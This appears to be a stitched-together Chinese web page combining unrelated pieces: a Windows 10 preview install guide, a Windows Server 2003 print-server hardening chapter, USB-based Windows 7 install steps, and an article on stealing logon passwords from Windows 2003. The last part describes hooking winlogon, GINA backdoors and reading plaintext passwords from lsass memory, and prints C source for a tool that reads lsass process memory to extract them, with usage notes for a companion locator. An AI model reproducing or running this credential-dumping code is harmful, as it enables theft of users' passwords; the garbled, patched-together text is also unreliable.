在安装之前你需要了解一点，那就是Windows 10技术预览版是一个相当早期的系统，当中难免会存在许多重大的问题。如果你执意想要安装，那首先需要将存储在PC当中的所有数据进行备份，以防安装过程当中出现任何错误。

配置要求

Windows 10技术预览版目前仅限PC和配备x86处理器的Windows平板安装，尚无为ARM设备准备的版本。以下是Windows 10的硬件需求，和Windows 8.1一样都不高。

· 处理器：1GHz或更快，支持PAE、NX和SSE2

· 内存：1GB(32位)或2GB(64位)

· 硬盘空间：16GB

· 显卡：微软DirectX 9图形设备及WDDM驱动

除此之外，你还需要一个微软帐号和网络连接。如果你想要访问Windows应用商店或使用Windows应用，你显示器的分辨率至少需要是1024x768。Windows 10技术预览版目前共有英语、简体中文和巴西葡萄牙语几种语言。

在安装之前，你需要前往preview.windows.com下载Windows 10技术预览版的光盘镜像。镜像文件分别32位和64位两个版本，如果你不清楚应该使用哪一个，可以在“这台电脑”或“我的电脑”的属性窗口当中“系统类型”一栏当中查看。

安装

Windows 10是一个非常早期的版本，因此它并不适宜覆盖你现有的操作系统——特别是考虑到这样做会让Windows Media Player无法播放DVD，并从升级的Windows 8.1专业版当中移除Windows Media Center。

如果你有一台多余的电脑，那就在上面测试这个预览版吧。但大多数用户应该把Windows 10技术预览版安装在虚拟机当中，或是新建一个硬盘分区来组成双系统。

虚拟机

在虚拟机当中安装是最简单的选择。只需借助于甲骨文的免费虚拟机工具Grad VirtualBox，你就可以体验到Windows 10了。在虚拟机当中安装该系统所用到的配置和Windows 8几乎完全相同，用户在安装时应该不会遇到任何问题。

如果你的安装失败，那就尝试调整下面这些配置吧。完成了Windows 10的初次设置之后，开启虚拟机工具的设置>系统菜单。在“主板”标签下，确保“开启EFI(仅特殊系统)”的框体是被勾选了的。“处理器”标签下的“开启PAE/NX”也是如此。

双系统

在虚拟机当中运行操作系统会牺牲掉一部分的性能，特别是你没有多余的CPU核心或内存空间来执行这一任务的话。如果你想要原生体验Windows 10，那你可以在硬盘上新建一个分区，然后将系统安装在此。

硬盘的分区可以借助第三方工具实现，或者是在“这台电脑”>“管理”窗口中的“存储”>“磁盘存储”当中进行。通过使用微软官方的Windows 7 USB/DVD工具，你就可以把下载好的光盘镜像制作成可启动的U盘，然后通过它来安装系统。

win2003对打印服务器的保护

强化打印服务器

概述

因为打印服务器提供的大多数重要服务都需要Microsoft Windows 网络基本输入/输出系统（NetBIOS）相关协议的支持，所以本章将重点讨论在进一步强化打印服务器安全性方面存在的一些挑战。服务器消息块（SMB）协议和通用Internet文件系统（CIFS） 协议能给未经授权用户提供大量的信息。因此，我们经常建议在高安全性的Windows环境中禁止打印服务器使用这些协议。但是，禁用这些协议可能给您的环境中的管理员和用户访问打印服务器造成一定的困难。

审核策略设置

安全选项

Microsoft网络服务器：数字签署通信（始终）

表7.1：设置

"Microsoft网络服务器：数字签署通信（始终）"设置决定了数据包签署对于SMB服务器组件来说是否是必需的。SMB协议为Microsoft的文件和打印共享以及像远程Windows管理这样的其它许多网络操作提供了基础。为了阻止SMB数据包在传输过程中受到人为攻击，SMB协议支持SMB数据包的数字签署。该设置决定了服务器和SMB 客户端之间的通信在被允许之前是否可以忽略SMB数据包的数字签署。

尽管该设置被缺省为禁用状态，但是您可以通过MSBP在本指南定义的高安全性环境中启用服务器的这个设置。您可以启用打印服务器上的这个设置以便用户执行打印操作，但是它不允许用户查看打印队列。试图查看打印队列的用户将得到拒绝访问的消息。出于上述原因，在本指南定义的三种环境中，"Microsoft 网络服务器：数字签名通信（始终）"设置被配置为"禁用 "打印服务器。

事件日志设置

系统服务

任何服务和应用软件都是攻击者的潜在目标，所以应该禁用或删除不需要的服务和可执行文件。在MSBP中，可选服务和不必要服务都应该被禁用。以下内容详细描述了应该在打印服务器上启用的服务。

后台打印

表7.2：设置

"后台打印处理"服务管理着所有本地和网络打印队列并控制所有的打印工作。后台打印处理服务是 Windows 打印子系统的中心，它与打印驱动程序和输入/输出（I/O）组件进行通信。

打印服务器依赖于"后台打印处理"服务的正确运行。为了让打印服务器处理客户机的打印工作，该服务必须设置为运行。您可以使用组策略将" 后台打印处理" 服务的启动模式设置为"只允许服务器管理员访问"，以防止服务被未经授权或怀有恶意的用户设置或操作。组策略也可以防止管理者无意中禁用该服务。其原因是：在本指南定义的三种安全环境中，"后台打印处理"设置都被配置为"自动"。

其它安全性设置

MSBP中应用的安全设置大大提高了打印服务器的安全性。不过，您还需要考虑其它一些注意事项。有些步骤不能通过组策略来完成，而要在所有打印服务器上手动执行操作。

保护众所周知帐户的安全

Microsoft Windows Server? 2003具有大量的内置用户帐户，这些帐户不能被删除，但是可以重命名。Windows 2003中最常见的两个内置帐户是Guest 和Administrator 。Guest 帐户在成员服务器和域控制器上缺省为禁用状态。此设置不应该被更改。内置的Administrator 帐户应该被重命名并改变描述。以防止攻击者利用该帐户危及远程服务器的安全。许多恶意代码的变种企图使用内置的管理员账户来破坏一台服务器。在近几年来，进行上述重命名配置的意义已经大大降低了，因为出现了很多新的攻击工具，这些工具企图通过指定内置 Administrator 账户的安全标识（SID）来确定该帐户的真实姓名，从而侵占服务器。SID是识别每个用户、组、计算机帐户和网络登录的唯一值。要改变内置帐户的SID 是不可能的。您可以用一个特别的名字重新命名本地的administrator帐户，以便您能够监控对该帐户的攻击行为。

保护打印服务器上的众所周知帐户

1. 重新命名Administrator和Guest帐户，然后改变每个域和服务器的密码为长且复杂的值。2. 为每个服务器使用不同的名称和密码。如果所有的域和服务器使用同一个帐户名和密码，取得一个服务器访问权的攻击者就可以用相同的帐户名和密码取得其它域和服务器的访问权。3. 改变缺省的帐户描述，以防止这些帐户被轻易识别出来。4. 在安全的地方记录上述改变。

注意：内置的Administrator帐户可以通过组策略重新命名。这个设置不能通过本指南提供的任何安全模板进行配置，因为您应该为您的环境选择一个特别的名字。在本指南定义的三种环境下，"账户：重命名管理员账户"可以被配置为重命名管理员账户。该设置是组策略安全选项设置的一部分。

保护服务帐户的安全

除非绝对必要，决不要将服务设定为在域帐户的安全上下文中运行。如果服务器的物理安全受到破坏，域账户密码可以很容易通过转储本地安全性授权（LSA）秘文而获得。

用IPSec过滤器阻断端口

Internet协议安全（IPSec）过滤器能为提高服务器的安全级别提供一条有效的途径。本指南推荐在其定义的高安全性环境中使用该选项，以便进一步减少服务器的攻击表面积。

下表列出了可以在本指南定义的高安全性环境中的打印服务器上创建的所有IPSec过滤器

表7.3：打印服务器IPSec网络流量图

在实现上表中列出的所有规则时都应该进行镜像处理。以确保进入服务器的所有网络流量也可以返回到源服务器。

上表描述了服务器执行特别任务功能所需打开的基本端口。如果服务器使用静态IP地址，那么这些端口就已经足够了。要是希望提供其它功能，您需要开放其它端口。开放其它端口可使您环境中的打印服务器更容易管理，不过，它们可能大大降低这些服务器的安全性。

因为域成员和域控制器之间存在大量交互操作，在特殊的RPC和身份验证通信中，您需要允许文件服务器和所有域控制器之间的所有通信。通信还可以被进一步限制，但是大多数环境都需要为有效保护服务器而创建更多的过滤器。这使得IPSec策略的执行和管理更为困难。与一个打印服务器相关的所有域控制器都要创建相似的规则。为了提高打印服务器的可靠性和可用性，您需要为环境中的所有域控制器添加更多规则。

如上所述，如果需要在环境中允许Microsoft Operation manager（MOM），运行IPSec过滤器的服务器和MOM服务器之间的所有网络通信都必须被允许通过。这一点十分重要，因为MOM服务器和OnePoint客户--向MOM控制台提供报告的客户端应用程序--之间具有大量的交互行为。其它的管理软件可能也具有类似的要求。如果您需要更高级别的安全性，OnePoint客户过滤操作可以被配置为就IPSec和MOM服务器进行协商。

IPSec策略可以阻止任意一个高端口的通信，因此，您将无法进行远程过程调用（RPC）通信。这使得服务器的管理更加困难。因为这么多的端口已经被有效关闭，您可以启用终端访问，以方便管理员进行远程管理。

上面的网络流量图假定环境中包括启用了Active Directory的DNS服务器。如果使用静态DNS服务器，您还需要设定其它规则.执行IPSec策略不会对服务器的性能产生太大影响。不过，您应该在执行这些过滤之前首先进行测试，以便确保服务器的必要功能和性能得以保持。如果希望支持其它应用软件，您还需要添加其它的规则。

本指南包括一个.cmd文件，它简化了依照指南要求为域控制器创建IPSec过滤器的过程。PacketFilters-File.cmd文件使用NETSH命令创建适当的过滤器。您必须修改.cmd文件以使它包括您所在环境中的域控制器的IP地址。脚本为即将添加的域控制器提供了两个占位符。如果需要，您还可以添加其它的域控制器。域控制器的IP地址列表必须是最新的。

总结

本章阐述了在本指南所定义的三种环境中保护打印服务器的安全所需采取的服务器强化设置。所论述的大多数设置都通过使用组策略来进行配置和加载的。您可以将能够为MSBP提供有益补充的组策略对象（GPO）链接到包含打印服务器的相应组织单位（OU），以便为这些服务器提供的服务赋予更多的安全性。

文中提及的某些设置不能使用组策略来进行应用。在这些情况下，我们提供了手动配置这些设置所需的详细资料。此外，我们还详细介绍了创建和应用能够控制打印服务器间网络通信类型的IPSec过滤器的具体过程。

一键U盘安装win7系统步骤：

1.下载下来在电脑上的Win7系统文件一般为ISO压缩文件，我们先使用WinRAR解压。

2.接下来将解压后的文件，提取所有文件到U盘根目录，并将里面名为bootmgr文件重命名为win7mgr(针对原版系统)，如果不是原版系统，则请将解压后文件夹里面的**.GHOt文件(如上图为：WINDOWS7.GHO那个)复制到U盘GHO目录(如果没有请手工创建)下。并且将文件名改成"auto.gho"。最后重启系统从U盘启动选择【05 DOS下安装系统GHO到硬盘第一分区】也可以实现一键U盘系统安装。

3.设置电脑从U盘启动，插上U盘启动电脑，进入选择菜单界面，选择【12】，然后在下一个界面中选择【2】进入WINPE安装Win7。

4.点击“开始安装”按钮，进行系统安装。

5.勾选“我接受许可条款”，单击“下一步”按钮。

6.选择“自定义”安装。

7.选择系统安装路径。

8.将事先准备好的密钥输入，点击“下一步”。

方法二、这种方式的安装方法有两种

第一种方式：

1.将U盘制作成启动U盘后，直接将WIN7镜像文件ISO存放到U盘目录或是硬盘中，利用启动U盘启动电脑进入PE选择菜单，选择【12】如图：

2.在接下来的界面中，选择【01】，如图：

3.进入WINPE后，找到刚才准备好的原版WIN7镜像文件，利用ImDisk将其加载成虚拟磁盘。

4.请记住加载后的虚拟磁盘盘符，这里为F，之后点击确定按钮。

5.打开虚拟磁盘，在目录中找到“setup.exe”，双击运行它。

之后的操作和方法一一样，可参看方法一的步骤，这里不再详细列出。

第二种方式：

1.步骤1、2、3均和方式1一样。

2.将镜像文件加载成虚拟磁盘后，利用“windows通用安装器”找到刚才的install.wim文件进行安装。

3.选择好后，单击“下一步”按钮。

4.选择系统安装目录，之后分别单击左侧的两个按钮，注意此过程可能会提示你格式化所选分区，单击“是”即可。

5.单击“下一步”按钮。

6.单击“下一步”按钮。

7.单击“安装系统”按钮，开始安装系统。

8.初步安装完成后，会弹出一个提示要求重启电脑，单击“确定”，然后手动重启电脑，注意这里可能需要几分钟，请耐性等待。

之后的步骤和方法一差不多，这里就不再一一列出了，其实以上主要是为了方面，一般我们将解压后的ISO文件夹里面的Windows7.Gho系统文件放置到U盘里面即可，之后重启电脑，进入PE工具，使用一键Ghost安装Win7也是很简答的。

使用u盘启动盘装系统可以用好几种方法，这边就为您带来关于用windows安装器来 安装原版win7 系统的方法，感兴趣的朋友们可以一起来学学，下面我们来看看用windows安装器怎样安装原版win7系统。

1、将制作好的u启动u盘启动盘插入电脑usb接口，然后按开机启动快捷键进入u启动pe系统主菜单界面，选择“【02】运行u启动win8pe防蓝屏版(新电脑)”并回车，如图：

2、打开pe系统桌面上的“虚拟光驱”，点击“装载”加载win7系统镜像，如图：

3、打开pe系统桌面上的“windows安装器”，选项卡切换到“Windows Vista/7/8/2008/2012”上，选择好磁盘安装的相应路径，windows安装文件的路径为“H:sourcesinstall.wim”(这边路径可以通过上个步骤装载虚拟光驱过程来看)，点击“开始安装”，如图：

4、之后在弹出的提示框中点击确定，这里可根据自身需要勾选相应选项，如图：

5、接着重启电脑，就开始安装win7系统了，我们只需静静等待，直至安装完成后进行相应系统设置后就能使用win7了。如图：

如何在win2003中得到登陆密码

在所有NT系统中，都是有几种方法可以得到登陆用户的密码的。我知道的三种方法可以达到目的。

1.hook了winlogon中几个函数，网上也有这类型的程序，叫winlogonhijack的项目在rootkit.com中有提供，不过那个项目只对本地登陆用户有效，远程登陆用户无效。 2.使用Gina和winlogon进行套接，只要对某些函数执行自己的记录密码的代码，就可以将密码记录下来，稳定性高，而且对本地或远程登陆都有效，不过现存的gina后门程序在XP或2003中都有些函数没有被导出过，主要因为xp和2003等在winlogon中加入了新的函数。

3.直接读取内存数据得到明文密码。在NT 4.0/2K中，早就有程序findpass可以直接读到winlogon进程中的内存数据而直接得到登陆用户密码，因为在NT4.0和2K中，帐号的信息，包括域名，帐号和密码都是有规律地在winlogon内存中的特定地址中，所以可以很简单就得到。但在XP和2003系统中，这样方法是无效的了，似乎我们是没有办法直接读出明文地址了。下面我们就来谈谈如何象findpass在NT 4.0和2K在，在server 2003中得到登陆用户的密码。

虽然XP和2003是不象以前的NT系统那样将登陆用户信息保存在winlogon进程的内存地址内，但是基Lsass进程对于要处理些信息时，需要得到明文的登陆用户密码，所以登陆用户的密码会在Lsass进程中出现(微软没有将密码在Lsass进程中进行加密，微软的说法是因为Lsass需要得到明文的密码，就算将密码加密，也都只能用可逆的方法加密，只要跟踪lsass的操作，一样可以得到明文密码，所以微软使用了比较懒惰的方法，可能也是为了加快响应速度，所以将明文密码更是放在lsass进程内存内)。说到这里，大家心里都清楚了，登陆用户的密码是在lsass进程的内存中。对，就是这么一回事，但是要得到这个明文密码，真是象使用NT 4.0和2K下的findpass那样容易吗?事实上并不是那么容易，因为以下几个原因:

A.密码存放在lsass进程中的内存地址是没有规律的

B.密码有可能被最后登陆的用户复盖(例如管理员abc从本地登陆，然后管理员bbb从远程登陆，然后管理员bbb注销终端，存放在lsass.exe进程内存中的密码，还是管理员bbb的密码)，又或者用户登陆后，然后注销了，那么我们就算得到了密码，也不知道是哪个用户的密码。

C.密码前后的数据也是没有规律的，如果有规律，例如密码前的数据，一定是有一段全是01字符的数据段，那么定位密码就简单。

原因A和C都给我们带来定位密码的困难，原B就带来不能确定密码和帐号对应的问题.看来微软在新的系统还是做过点功夫。不过我们是不会放弃的，就算是碰碰运气，也看能不能得到密码，反正就算失败，也没什么关系。

最后的代码，是我写来测试是不是能在2003的系统中得到登际用户的密码，结果也正好象我们上面的分析一样(当然了，上面的结果是用这程序测测得到的)。成功率当然不高，因为受太多原因所影响，定位密码上的困难或者无法定位，或者得到不是密码的信息等等的原因，都令失败率显得相当高，不过总还是一种方法，或者将来有人可以准确定位到，那就是令人高兴了。虽然说失败率高，但在一种情况下，成功率却是很高的，那就是管理员只是在本地或终端中登陆了，以后再没有用户从本地或终端登陆过，而且管理员也没有锁上过系统，那么成功率就会是相当高的了。

提高成功率的两种做法:

1.程序直接写成服务，定时检查本地或远程登陆(其实没什么分别)，当检测到登陆后，去搜索lsass进程内存，尝试得到密码。 2.程序模拟一个登陆(使用LogonUser()就能搞定)，因为使用LogonUser()这个API，你要提供帐号名和对应的正确的密码，才可以成功，然后你就可以去搜索lsass进程内存。因为知道密码是什么，我们就能定位到密码是保存在什么地方。因为登陆用户的密码都是保存在同一个地址或相离不远的地址中，模拟登陆和搜索，可以先定位以后登陆的用户的密码会大约保存在什么位置。

无论怎说，三种方法中，最稳定，最安全的方法还是使用Gina那种方法.Hijack了winlogn一些API的方法，毕竟是改动了系统的东西，对系统的稳定性来说，会有考验，直接搜索lsass进程内存的方法呢，虽说也是困难，但准确性，成功率却又是低。

下面的代码使用的是很笨，而且很原始的搜索方法，主要是搜索Lsass内存中"LocalSystem Remote Procedure"这个字符串，因为在相当多的测试中，密码都是保存在有这个字符串的地址后一点的位置中，当然了，很多系统并没有这个字符串，或者就算有，我们得到的都是错误的密码。

代码: //************************************************************* // Version: V1.0 // Coder: WinEggDrop // Date Release: 12/15/2004 // Purpose: To Demonstrate Searching Logon User Password On 2003 Box，The Method // Used Is Pretty Unwise，But This May Be The Only Way To Review The // Logon Users Password On Windows 2003. // Test PlatForm: Windows 2003 // Compiled On: VC++ 6.0 //*************************************************************#include #include #include

#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address，Which Causes The Result Unreliable

char Password[MAX_PATH] = ; // Store The Found Password

// Function ProtoType Declaration //------------------------------------------------------------------------------------------------------ BOOL FindPassword(DWORD PID); int Search(char *Buffer，const UINT nSize); DWORD GetLsassPID(); BOOL Is2003(); //------------------------------------------------------------------------------------------------------ // End Of Fucntion ProtoType Declaration

int main() { DWORD PID = 0; printf("Windows 2003 Password Viewer V1.0 By WinEggDropnn");

if (!Is2003()) // Check Out If The Box Is 2003 {printf("The Program Cant Only Run On Windows 2003 Platformn");return -1; }

PID = GetLsassPID(); // Get The Lsass.exe PID

if (PID == 0) // Fail To Get PID If Returning Zerom {return -1; }

FindPassword(PID); // Find The Password From Lsass.exe Memory return 0; } // End main()

//------------------------------------------------------------------------------------ // Purpose: Search The Memory & Try To Get The Password // Return Type: int // Parameters: // In: char *Buffer -->The Memory Buffer To Search // Out: const UINT nSize -->The Size Of The Memory Buffer // Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure"， // Since The Password Is Near The Above Location，But Its Not Always True That // We Will Find The Magic String，Or Even We Find It，The Password May Be Located // At Some Other Place.We Only Look For Luck //------------------------------------------------------------------------------------ int Search(char *Buffer，const UINT nSize) { UINT OffSet = 0; UINT i = 0; UINT j = 0 ; UINT Count = 0; if (Buffer == NULL) {return -1; } for (i = 0 ; i 0){Password[Count++] = Buffer[j];}else{break;}}return i + 7; // One Flag To Indicate We Find The Password}} } return -1; // Well，We Fail To Find The Password，And This Always Happens } // End Search

//------------------------------------------------------------------------------------ // Purpose: To Get The Lsass.exe PID // Return Type: DWORD // Parameters: None //------------------------------------------------------------------------------------ DWORD GetLsassPID() { HANDLE hProcessSnap; HANDLE hProcess = NULL; PROCESSENTRY32 pe32; DWORD PID = 0;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS， 0); if( hProcessSnap == INVALID_HANDLE_VALUE ) {printf("Fail To Create Snap Shotn");return 0; }

pe32.dwSize = sizeof(PROCESSENTRY32);

if( !Process32First(hProcessSnap， &pe32)) {CloseHandle(hProcessSnap); // Must clean up the snapshot object!return 0; }

do {if (strcmpi(pe32.szExeFile，"Lsass.EXE") == 0){PID = pe32.th32ProcessID;break;} }while(Process32Next( hProcessSnap， &pe32));

CloseHandle( hProcessSnap); return PID; } // End GetLsassPID()

//------------------------------------------------------------------------------------ // Purpose: To Find The Password // Return Type: BOOLEAN // Parameters: // In: DWORD PID ->The Lsass.exes PID //------------------------------------------------------------------------------------ BOOL FindPassword(DWORD PID) { HANDLE hProcess = NULL; char Buffer[5 * 1024] = ; DWORD ByteGet = 0; int Found = -1;

hProcess = OpenProcess(PROCESS_VM_READ，FALSE，PID); // Open Process if (hProcess == NULL) {printf("Fail To Open Processn");return FALSE; }

if (!ReadProcessMemory(hProcess，(PVOID)BaseAddress，Buffer，5 * 1024，&ByteGet)) // Read The Memory From Lsass.exe {printf("Fail To Read Memoryn");CloseHandle(hProcess);return FALSE; }

CloseHandle(hProcess);Found = Search(Buffer，ByteGet); // Search The Password if (Found >= 0) // We May Find The Password {if (strlen(Password) >0) // Yes，We Find The Password Even We Dont Know If The Password Is Correct Or Not{printf("Found Password At #0x%x ->"%s"n"，Found + BaseAddress，Password);} } else {printf("Fail To Find The Passwordn"); } return TRUE; } // End FindPassword

//------------------------------------------------------------------------------------ // Purpose: Check If The Box Is Windows 2003 // Return Type: BOOLEAN // Parameters: None //------------------------------------------------------------------------------------ BOOL Is2003() { OSVERSIONINFOEX osvi; BOOL b0sVersionInfoEx; ZeroMemory(&osvi，sizeof(OSVERSIONINFOEX)); osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);

if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi))) {osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO); } return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2); } // End Is2003() // End Of File

附件程序相当于密码定位程序，用来测试在lsass内存中搜索指定的字符串或模拟登陆的密码.

用法:

1.locator 字符串 ->在lsass进程内存中搜索指定的那个"字符串"，返回确定的位置

2.Locator 用户名 密码 ->在系统中建立一个参数指定的用户，并进行模拟登陆，然后搜索"密码"在lsass进程内存中的位置，生成的帐户程序运行完后会自动删除。